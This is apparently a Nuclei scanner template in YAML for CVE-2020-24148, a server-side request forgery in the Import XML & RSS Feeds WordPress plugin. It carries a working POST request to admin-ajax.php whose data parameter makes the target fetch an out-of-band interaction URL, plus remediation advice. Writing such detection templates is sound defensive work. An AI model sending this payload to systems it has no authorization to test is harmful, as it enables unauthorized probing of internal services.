41 lines
1.7 KiB
YAML
41 lines
1.7 KiB
YAML
id: CVE-2020-24148
|
|
|
|
info:
|
|
name: Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action.
|
|
remediation: |
|
|
Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability.
|
|
reference:
|
|
- https://github.com/dwisiswant0/CVE-2020-24148
|
|
- https://wordpress.org/plugins/import-xml-feed/#developers
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24148
|
|
- https://github.com/secwx/research/blob/main/cve/CVE-2020-24148.md
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
|
|
cvss-score: 9.1
|
|
cve-id: CVE-2020-24148
|
|
cwe-id: CWE-918
|
|
epss-score: 0.10229
|
|
epss-percentile: 0.94371
|
|
cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: mooveagency
|
|
product: import_xml_and_rss_feeds
|
|
framework: wordpress
|
|
tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml"
|
|
|
|
body: "type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0"
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
# digest: 4b0a00483046022100dee0f4d4c45b5e12b3f88c5e49074d7baa37a851f3e2c7dd22143a1e4ce8ca45022100db05bafede789e21bbf6ed97124a99344e64f871782b7b087fe60bbd63fe6c48:922c64590222798bb761d5b6d8e72950 |